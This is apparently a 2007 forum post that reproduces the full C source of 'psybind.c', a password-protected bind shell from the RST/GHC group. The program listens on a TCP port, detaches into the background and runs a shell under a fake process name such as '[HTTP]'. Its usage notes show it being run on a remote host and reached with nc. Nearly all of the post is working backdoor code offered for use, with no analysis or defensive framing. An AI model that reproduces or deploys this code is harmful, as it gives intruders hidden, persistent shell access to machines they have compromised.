Kod:
/*
O O o o . . . . . . . . o o O O
O O
. .
. RST/GHC Pseudo Bind Shell [ psybind.c ] .
. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= .
. [v 1.0.0] .
[Compiling]:
$ gcc -o psybind psybind.c
[Usage]:
$ ./psybind <options>
[Option] [Default] [Description]
-p [7654] Port number
-w [rstghc] Set password
-r [/] Start path
-c [[HTTP]] Fake process name
-s [/bin/bash] Shell(program) path
-h This screen
[Example]:
. Run in Remote Host: .
. $ ./psybind -s /bin/sh -c girl -r /home -w 123 -p 31337 .
. .
. To connect with remote computer: .
o $ nc 127.0.0.1 31337 o
o o
O Code by Dr_UF0_51 (civufo[at]mail.ru) O
O Good luck ;) O
O O o o . . . . . . . . o o O O
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <unistd.h>
#include <netinet/in.h>
#include <errno.h>
#include <termios.h>
#include <sys/select.h>
#include <sys/time.h>
#include <sys/types.h>
#include <strings.h>
#include <signal.h>
#include <wait.h>
#include <string.h>
#define BUFSIZE 1024
void usage(void);
void waitpd(int);
char motd[] = "\nWelcome to RST/GHC - Pseudo Bind Shell\n\n";
int main(int arg, char **param)
{
int sd, nread, datas, td, i, dn, pid;
int sins = 0x10; // Size
int ptym, ptyn;
struct sockaddr_in saddrs;
struct sockaddr_in saddrd;
struct termios terms;
fd_set fds;
char *buffer[BUFSIZE];
char *password[255], c;
int port = 7654; // Port number
char pass[255] = "rstghc"; // Password
char path[255] = "/"; // Start path
char cmdname[255] = "[HTTP]"; // Fake process name
char shell[255] = "/bin/bash"; // Program [shell]
/* Arguments */
while(( c = getopt(arg, param, "p:w:c:r:s:h")) > 0)
switch(c)
{
case 'p':
port = atoi(optarg);
break;
case 'w':
strncpy(pass, optarg, 255);
break;
case 'c':
strncpy(cmdname, optarg, 255);
break;
case 'r':
strncpy(path, optarg, 255);
break;
case 's':
strncpy(shell, optarg, 255);
break;
case 'h':
usage();
exit(0);
break;
}
/* Port check */
if( port > 65535 | port < 1)
{
fprintf(stderr, "Error: Ports must be > 0 and < 65535\n");
exit(1);
}
/* Creat Socket struct */
bzero(&saddrs, sizeof(saddrs));
saddrs.sin_family = AF_INET;
saddrs.sin_port = htons(port);
saddrs.sin_addr.s_addr = INADDR_ANY;
/* Creat Socket */
if(( sd = socket( AF_INET, SOCK_STREAM, 0)) < 0)
{
fprintf(stderr, "Error[%d]: Creat Socket Failed\n", errno);
exit(2);
}
/* Bind Port */
if( bind(sd, (struct sockaddr *)&saddrs, sizeof(saddrs)) < 0)
{
fprintf(stderr, "Error[%d]: Bind Port Failed\n", errno);
close(sd);
exit(3);
}
/* Listen Port */
if( listen(sd, 5) < 0) // Max active connections = 5
{
fprintf(stderr, "Error[%d]: Listen Port Failed\n", errno);
close(sd);
exit(4);
}
/* PID */
if((pid = fork()) != 0)
{
printf("Shell Started.. [pid = %d] Good luck ;)\n", pid) ;
exit(0);
}
chdir(path); // Path
setsid(); // Run in a new session
signal(SIGCHLD, waitpd); // Waitpid
/* Wait Data */
for(;;)
{
if(( datas = accept(sd, (struct sockaddr *)&saddrd, &sins)) > 0) // If data accepted, start
if((pid = fork()) < 0)
continue;
else if(pid == 0)
{
/* Open Pseudo - Terminal Master*/
if(( ptym = getpt()) < 0)
{
fprintf(stderr, "Error[%d]: Can't Open Pseudo - Terminal Master\n", errno);
exit(5);
}
/* Unlock Slave Pseudo Terminal */
if( unlockpt(ptym) < 0 )
{
fprintf(stderr, "Error[%d]: Can't Unlock Slave Pseudo Terminal\n", errno);
exit(6);
}
/* Process Group Id*/
if(setpgid(0, 0) < 0)
{
fprintf(stderr, "Error[%d]: Setpgid Failed\n", errno);
exit(8);
}
ptyn = ptsname(ptym); // Name of the slave pseudo-terminal
tcgetattr(0, &terms); // Sandart input
/* Open terminal */
if(( td = open((char *)ptyn, O_RDWR)) < 0)
{
fprintf(stderr, "Error[%d]: Can't Open Terminal Name\n", errno);
exit(7);
}
/* Fork */
if( fork() == 0)
{
if(setsid() < 0)
{
fprintf(stderr, "Error[%d]: setsid Failed\n", errno);
exit(6);
}
tcsetattr(td, TCSANOW, &terms); // Set parametr now
write(td, "Password: ", 10);
read(td, password, sizeof(password));
dup2(td, 0);
dup2(td, 1);
dup2(td, 2);
/* Check password */
if(!chpass(password, pass))
{
write(td, motd, strlen(motd));
close(td);
execl( shell, cmdname, 0); // Exec shell
}
close(td);
}
close(td);
for(;;)
{
FD_ZERO(&fds);
FD_SET(datas, &fds); // Set datas for select
FD_SET(ptym, &fds); // Set ptym for select
if((i = select( ptym + 1, &fds, NULL, NULL, NULL)) <= 0)// Wait data for select descriptor
break;
if(FD_ISSET(datas, &fds)) // If socket
{
bzero(buffer, sizeof(buffer));
if(( nread = read (datas, buffer, BUFSIZE)) <= 0)
break;
if( write(ptym, buffer, nread) <= 0)
break;
}
if(FD_ISSET(ptym, &fds)) // If pty
{
bzero(buffer, sizeof(buffer));
if(( nread = read ( ptym, buffer, BUFSIZE)) <= 0)
break;
if(write(datas, buffer, nread) <= 0)
break;
}
}
close(datas);
close(ptym);
exit(0);
} // fork
close(datas);
} // for
}
/** Waitpid (fucking zombie ;) **/
void waitpd(int i)
{
waitpid(-1, NULL, WNOHANG);
}
/** Usage **/
void usage(void)
{
printf("\n\t RST/GHC Pseudo Bind Shell");
printf("\t =--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=\n");
printf("\t\t\t\t\t\t\t\tby Dr_UF0_51\n\n");
printf("Usage: ./psybind <options>\n");
printf("\t-p [7654] Port number\n");
printf("\t-w [rstghc] Set password\n");
printf("\t-r [/] Start path\n");
printf("\t-c [[HTTP]] Fake process name\n");
printf("\t-s [/bin/bash] Shell(program) path\n");
printf("\t-h This screen\n");
}
/** Check Password **/
int chpass(char *str1, char *str2)
{
int i, s1 = 0, k = 1;
if(str1[strlen(str1) - 1] = 0x0d) k++; // if telnet
for(i = 0; i < strlen(str1) - k; i++)
if( str1[i] != str2[i] )
{
s1 = 1;
break;
}
if( strlen(str1) == k ) s1 = 1; // If ENTER pressed
return(s1);
}
06-12-2007, 07:46
Normal
